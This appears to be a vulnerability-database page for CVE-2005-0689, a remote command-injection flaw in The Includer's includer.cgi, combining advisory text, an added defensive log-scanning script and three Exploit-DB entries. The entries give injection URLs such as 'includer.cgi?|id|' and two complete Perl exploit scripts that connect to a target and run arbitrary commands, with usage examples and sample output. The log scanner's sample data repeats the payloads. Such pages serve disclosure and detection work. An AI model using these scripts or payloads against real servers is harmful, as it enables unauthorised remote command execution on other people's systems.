CVE-2005-0689
CVSS 7.5
Published: 2005-03-07 00:00:00
Last modified: 2016-10-17 23:13:43

[Original] includer.cgi in The Includer allows remote attackers to execute arbitrary commands via shell metacharacters in (1) the URL or (2) the template parameter.


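[CNNVD] The Includer remote command execution vulnerability (CNNVD-200503-062)

        Remote attackers can use includer.cgi in The Includer to execute arbitrary commands via shell metacharacters in (1) the URL or (2) the template parameter.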
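
Added example (not part of the original record or of The Includer): a log check that flags requests to includer.cgi whose query carries shell metacharacters in either vector named above, the bare URL query or the template parameter. The log lines are constructed samples, the function names are hypothetical, and the metacharacter set is an assumption to tune for your environment.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines; addresses are from documentation ranges.
SAMPLE_LOG = """\
192.0.2.10 - - [07/Mar/2005:10:00:01 +0000] "GET /cgi-bin/includer.cgi?template=main.html HTTP/1.0" 200 512
192.0.2.44 - - [07/Mar/2005:10:00:09 +0000] "GET /cgi-bin/includer.cgi?|id| HTTP/1.0" 200 48
192.0.2.44 - - [07/Mar/2005:10:00:12 +0000] "GET /includer.cgi?template=%7Cid%7C HTTP/1.0" 200 48
192.0.2.45 - - [07/Mar/2005:10:00:20 +0000] "GET http://www.example.test/cgi-bin/includer.cgi?template=|id| HTTP/1.1" 200 48
192.0.2.11 - - [07/Mar/2005:10:00:30 +0000] "GET /index.cgi?q=a|b HTTP/1.0" 200 100
"""

# The target is matched greedily so quotes inside the request do not cut it short.
REQUEST = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>.*) HTTP/\d\.\d" (?P<status>\d{3}) ')
SCRIPT = re.compile(r'(?:^|/)includer\.cgi$', re.IGNORECASE)
SHELL_META = re.compile(r'[|;&`$<>()\r\n]')  # assumed set, checked after URL-decoding

def suspicious_vectors(target):
    """Return which advisory vectors ('url', 'template') carry shell metacharacters."""
    path, sep, query = target.partition('?')
    if not sep or not SCRIPT.search(unquote(path)):
        return []
    hits = []
    for piece in query.split('&'):
        key, eq, value = piece.partition('=')
        if eq and unquote(key).lower() == 'template':
            vector, text = 'template', value
        else:
            vector, text = 'url', piece  # bare query text or any other parameter
        if SHELL_META.search(unquote(text)) and vector not in hits:
            hits.append(vector)
    return hits

def scan_log(text):
    """Return (client_ip, status, vectors, target) for every flagged request line."""
    findings = []
    for line in text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        vectors = suspicious_vectors(m.group('target'))
        if vectors:
            findings.append((m.group('ip'), int(m.group('status')), vectors, m.group('target')))
    return findings

if __name__ == "__main__":
    for ip, status, vectors, target in scan_log(SAMPLE_LOG):
        print(f"{ip} status={status} vectors={','.join(vectors)} target={target}")
```

A flagged request that returned status 200 is the one to triage first, since the script ran and produced a response.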

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:jimmy:the_includer:1.1
cpe:/a:jimmy:the_includer:1.0

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0689
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0689
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200503-062
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=111021730710779&w=2
(UNKNOWN)  BUGTRAQ  20050307 Remote Command Execution
http://marc.info/?l=bugtraq&m=111030957413411&w=2
(UNKNOWN)  BUGTRAQ  20050308 Re: Remote Command Execution
http://www.securityfocus.com/bid/12738
(VENDOR_ADVISORY)  BID  12738

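- Vulnerability information

The Includer remote command execution vulnerability
High risk  Input validation
2005-03-07 00:00:00 2005-10-20 00:00:00
Remote
        Remote attackers can use includer.cgi in The Includer to execute arbitrary commands via shell metacharacters in (1) the URL or (2) the template parameter.

- Advisories and patches

        No data available

- Vulnerability information (862)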

The Includer CGI <= 1.0 Remote Command Execution (EDBID:862)
cgi webapps
2005-03-07 Verified
0 Francisco Alisson
Remote Command Execution on:

Example I.: www.host-vulnerable.com/includer.cgi?|id|
Example II.: www.host-vulnerable.com/includer.cgi?template=|id|

# milw0rm.com [2005-03-07]
		

- Vulnerability information (922)

The Includer CGI <= 1.0 Remote Command Execution (new version) (EDBID:922)
cgi webapps
2005-04-08 Verified
0 GreenwooD
#!/usr/bin/perl

############################################################
# Target - The Includer CGI <= 1.0                         #
#                                                          #
# Based on - http://www.milw0rm.com/id.php?id=862          #
#                                                          #
# Info about bug - Stupid use "Open" function.             #
#                                                          #
############################################################
# If you want know more visit our home page at nst.void.ru #
############################################################
use IO::Socket;


if (@ARGV < 3)
{
  print " \n Includer CGI <= 1.0 Network Security Team - nst.void.ru\n\n";
  print " Usage: <target> <dir> <cmd>\n\n"; 
  print "   <host> - Host name of taget.\n";
  print "   <dir> - If not in dir type / symbol.\n";
  print "   <cmd> - command for execution.\n\n";
  print " Examples:\n\n";
  print "   incl_10.pl 127.0.0.1 /cgi-bin/ \"ls -la\"\n";
  print "   incl_10.pl 127.0.0.1 / \"uname -a\"\n";
  print "   incl_10.pl www.test.com / \"ps auxw\"\n";
  exit();
}


$serv = $ARGV[0];
$serv =~ s/http:\/\///ge;

$dir = $ARGV[1];
$cmd = $cmde = $ARGV[2];
  
print "\n ===[ Info for query ]========================\n";   
print " = Target: $serv\n";
print " = Dir: $dir\n";
print " = Cmd: $cmd\n";
print " =============================================\n\n";   

$cmde =~ s/ /"\$IFS"/ge;

$req  = "GET http://$serv";                                      
$req .= "$dir";
$req .= "includer.cgi?|echo\$IFS\"_N_\";$cmde;echo\$IFS\"_T_\"| HTTP/1.0\n\n";


$s = IO::Socket::INET->new(Proto=>"tcp",
                           PeerAddr=>"$serv",
                           PeerPort=>80) or die " (-) - Can't connect to the server\n";

print $s $req;

$flag = 0;

while ($ans = <$s>)

 {
   if ($ans =~ /_T_/) { print " =========================================================\n"; exit() }
   if ($flag == 1) { print " $ans"; }
   if ($ans =~ /^_N_/) { print " ===[ Executed command $cmd ]===============================\n"; $flag = 1 }
   
 }

# milw0rm.com [2005-04-08]
		

- Vulnerability information (923)

The Includer CGI <= 1.0 Remote Command Execution (new version2) (EDBID:923)
cgi webapps
2005-04-08 Verified
0 K-C0d3r
#!/usr/bin/perl
#
# [K-C0d3r] Includer.cgi 1.0 remote command execution [K-C0d3r]
#
# C0d3d By K-C0d3r, a www.x0n3-h4ck.org friend!
#
# I think the bug was discovered by Francisco Alisson.
#
# Greetz to: mZ, CorryL, Expanders, SiNaPsE, off, rikky, milw0rm.
#
# F**K o*f to all RxBot kiddies as e*****t, G***n, d***b.
#
##########################################################################
# [kc@K-C0d3r xpl]$ perl KCincluder.pl 127.0.0.1 /cgi-bin/includer.cgi 1
# [K-C0d3r] Includer.cgi Remote Command Execution Exploit [K-C0d3r]
# [?] Insert command: id
# [+] Conecting to 127.0.0.1
# [+] Connected to 127.0.0.1
# [+] Injecting command ...
# uid=500(kc) gid=500(kc) gruppi=500(kc)
# [kc@K-C0d3r xpl]$
##########################################################################

use IO::Socket;

sub Usage {
print STDERR "Usage:\nKCinc-xpl.pl <www.victim.com> </path/to/includer.cgi> <exploitation_type>.\n";
print STDERR "Exploitation Types:\n \t\t1: includer.cgi?|command|\n \t\t2: includer.cgi?template=|command|\n\n";
exit;
}

if (@ARGV < 3)
{
 Usage();
}


$host = @ARGV[0];
$path = @ARGV[1];
print "[K-C0d3r] Includer.cgi Remote Command Execution Exploit [K-C0d3r]\n";
print "[?] Insert command: ";
$command = <STDIN>;
$type = @ARGV[2];

if ($type > 2)
{
 Usage();
}


print "[+] Conecting to $host\n";

if ($type = 1)
{
$injection = "$host$path?|$command|";
$socket = new IO::Socket::INET (PeerAddr => "$host",
                                PeerPort => 80,
                                Proto => 'tcp');
                                die unless $socket;
print "[+] Connected to $host\n";
print "[+] Injecting command ...\n";
print $socket "GET http://$injection HTTP/1.1\nHost: $host\n\n";
while (<$socket>)
{
 print $_;
 exit;
}
}

if ($type = 2)
{
$injection = "$host$path?template=|$command|";
$socket = new IO::Socket::INET (PeerAddr => "$host",
                                PeerPort => 80,
                                Proto => 'tcp');
                                die unless $socket;
print "[+] Connected to $host\n";
print "[+] Injecting command\n";
print $socket "GET http://$injection HTTP/1.1\nHost: $host\n\n";
while (<$socket>)
{
 print $_;
 exit;
}
}

# milw0rm.com [2005-04-08]
		

- Vulnerability information

14624
The Includer includer.cgi Arbitrary Command Execution
Exploit Public

- Vulnerability description

Unknown or Incomplete

- Timeline

2005-03-07 Unknown
2005-03-07 Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete
 

 
